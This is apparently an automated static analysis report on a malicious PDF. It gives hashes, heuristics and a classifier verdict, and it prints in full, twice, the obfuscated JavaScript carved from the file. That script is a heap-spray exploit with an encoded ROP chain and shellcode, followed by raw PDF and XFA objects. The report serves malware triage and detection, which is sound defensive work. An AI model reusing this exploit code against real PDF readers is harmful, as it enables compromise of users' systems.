Malicious PDF — malware analysis report

Static analysis result for SHA-256 a2c6228f9aa7b6bd…

MALICIOUS

PDF

53.7 KB First seen: 2026-05-11
MD5: e413b987cf6a37406c095dba0348ae32 SHA-1: c911161ee9ced438204458eae0553a005339c212 SHA-256: a2c6228f9aa7b6bd313a87ad0df61ad16c8dee05fe47b69c6f6b6073ca8b82f9
76 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics, which is often used to exploit vulnerabilities or download further payloads. The presence of JavaScript and the ML classification suggest an attempt to deliver malicious content, though the specific payload and execution method are not fully discernible from the provided data. The embedded URL http://www.bitstream.com is noted as a potential IOC.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 4000 bytes
SHA-256: b36729e562ae5950392d7017562e6dc724945ff3e62abf1e82e6026b105d7bca
Detection
ClamAV: No threats found
Obfuscation or payload: likely
7 of 11 identifiers look randomly generated (e.g. 'txnivcbDOONURCVKojKYuDFqeNQeShrzlMxaUBGN') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep = unescape;
var txnivcbDOONURCVKojKYuDFqeNQeShrzlMxaUBGNiBzzBspIYraVwuEuxJaXEOXJQfayEasrwxYPdKKqeFlmdnKQBXMcvkMAcv = zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc929%uc4da%u74d9%uf424%u6bba%u2b70%u5fe5%u49b1%u5731%u0317%u1757%uc783%u8904%ud785%uc40d%u2866%ub6ce%ucdef%ue4ff%u8694%u3852%ucbde%ub35e%uffb2%ub1d5%u0f1a%u7f5d%u3e7d%u4e5e%uec41%ud19c%uef3d%u31f0%u207f%u3005%u5db8%u60e6%u2911%u9455%u6f16%u9566%ufbf8%uedd6%u3b7d%u47a2%u6c7f%udc1b%u9437%uba17%ua5e7%ud9f4%uecd4%u2971%ueeae%u6053%uc14f%u2e9b%ued6e%u2f11%ucab6%u5ac9%u28cc%u5c77%u5217%ue9a3%uf48a%u4920%u046f%u0fe4%u0ae4%u4441%u0ea2%u8954%u2bd8%u2cdd%uba0f%u0aa5%ue68b%u337e%u428a%u4cd0%u2bcc%ue88d%ude86%u8ada%ub6c4%ua02f%u46f6%ub338%u7485%u6fe7%u3502%ua960%u3ad5%u0d5b%uc549%u6d64%u0243%u3d30%ua3fb%ud639%u4cfb%u78ec%ue2ac%u385f%u431c%ud030%u4c76%uc06f%u8678%u6a18%u4182%u6b2d%ua38d%u6959%ud28d%ue4c5%ube6b%ua0e5%u5724%ue99f%uc6bf%u2460%uc9ba%ucaeb%u873a%ua71b%u7028%uf2ec%ud713%u29f3%ud839%ud561%u8fe8%ud71d%uf8cd%u2881%u7338%ubc0b%uec83%u5074%ued04%u3a22%u8504%u1e92%ub057%u8bdc%u69cb%u3349%udeba%u5bda%u3840%uc42c%u6fbb%u39ac%u566a%u4b2a%uba18%u41f6' );
var JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf = zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf.length + 20 + 8 < 65536) JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf+=JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf;
oce = JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf.substring(0, (0x0c0c-0x24)/2);
oce += txnivcbDOONURCVKojKYuDFqeNQeShrzlMxaUBGNiBzzBspIYraVwuEuxJaXEOXJQfayEasrwxYPdKKqeFlmdnKQBXMcvkMAcv;
oce += JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf;
NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy = oce.substring(0, 65536/2);
while(NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy.length < 0x80000) NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy += NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy;
TydLRZkswOoXqqjzEgptZfdnBYardZfbgSgYlLhgbniAgoRyGrppACeuNeOJYc = NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy.substring(0, 0x80000 - (0x1020-0x08) / 2);
var WKDTWvHZhkdBwVrKARtPfMicyQMFjGayFAQvvSKljXrgJaIDfHjaeeSeywKLIlJKATDOvVrzG = new Array();
for (tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt=0;tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt<0x1f0;tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt++) WKDTWvHZhkdBwVrKARtPfMicyQMFjGayFAQvvSKljXrgJaIDfHjaeeSeywKLIlJKATDOvVrzG[tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt]=TydLRZkswOoXqqjzEgptZfdnBYardZfbgSgYlLhgbniAgoRyGrppACeuNeOJYc+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4886 bytes
SHA-256: b5ced1c97bc824d780a238cdcb01d57f24ea5dd2acd90e6d2271c33601c84abc
Preview script
First 1,000 lines of the extracted script
var zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep = unescape;
var txnivcbDOONURCVKojKYuDFqeNQeShrzlMxaUBGNiBzzBspIYraVwuEuxJaXEOXJQfayEasrwxYPdKKqeFlmdnKQBXMcvkMAcv = zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc929%uc4da%u74d9%uf424%u6bba%u2b70%u5fe5%u49b1%u5731%u0317%u1757%uc783%u8904%ud785%uc40d%u2866%ub6ce%ucdef%ue4ff%u8694%u3852%ucbde%ub35e%uffb2%ub1d5%u0f1a%u7f5d%u3e7d%u4e5e%uec41%ud19c%uef3d%u31f0%u207f%u3005%u5db8%u60e6%u2911%u9455%u6f16%u9566%ufbf8%uedd6%u3b7d%u47a2%u6c7f%udc1b%u9437%uba17%ua5e7%ud9f4%uecd4%u2971%ueeae%u6053%uc14f%u2e9b%ued6e%u2f11%ucab6%u5ac9%u28cc%u5c77%u5217%ue9a3%uf48a%u4920%u046f%u0fe4%u0ae4%u4441%u0ea2%u8954%u2bd8%u2cdd%uba0f%u0aa5%ue68b%u337e%u428a%u4cd0%u2bcc%ue88d%ude86%u8ada%ub6c4%ua02f%u46f6%ub338%u7485%u6fe7%u3502%ua960%u3ad5%u0d5b%uc549%u6d64%u0243%u3d30%ua3fb%ud639%u4cfb%u78ec%ue2ac%u385f%u431c%ud030%u4c76%uc06f%u8678%u6a18%u4182%u6b2d%ua38d%u6959%ud28d%ue4c5%ube6b%ua0e5%u5724%ue99f%uc6bf%u2460%uc9ba%ucaeb%u873a%ua71b%u7028%uf2ec%ud713%u29f3%ud839%ud561%u8fe8%ud71d%uf8cd%u2881%u7338%ubc0b%uec83%u5074%ued04%u3a22%u8504%u1e92%ub057%u8bdc%u69cb%u3349%udeba%u5bda%u3840%uc42c%u6fbb%u39ac%u566a%u4b2a%uba18%u41f6' );
var JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf = zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf.length + 20 + 8 < 65536) JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf+=JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf;
oce = JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf.substring(0, (0x0c0c-0x24)/2);
oce += txnivcbDOONURCVKojKYuDFqeNQeShrzlMxaUBGNiBzzBspIYraVwuEuxJaXEOXJQfayEasrwxYPdKKqeFlmdnKQBXMcvkMAcv;
oce += JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf;
NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy = oce.substring(0, 65536/2);
while(NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy.length < 0x80000) NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy += NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy;
TydLRZkswOoXqqjzEgptZfdnBYardZfbgSgYlLhgbniAgoRyGrppACeuNeOJYc = NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy.substring(0, 0x80000 - (0x1020-0x08) / 2);
var WKDTWvHZhkdBwVrKARtPfMicyQMFjGayFAQvvSKljXrgJaIDfHjaeeSeywKLIlJKATDOvVrzG = new Array();
for (tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt=0;tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt<0x1f0;tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt++) WKDTWvHZhkdBwVrKARtPfMicyQMFjGayFAQvvSKljXrgJaIDfHjaeeSeywKLIlJKATDOvVrzG[tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt]=TydLRZkswOoXqqjzEgptZfdnBYardZfbgSgYlLhgbniAgoRyGrppACeuNeOJYc+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000054166 00000 n
0000054199 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54685
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: ff08a6d31739411e525f5d1ea2a8bdeb5d0b70b0088b936c8c2c3019156fff50
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C

Open this report in the interactive analyzer, or submit your own file for analysis.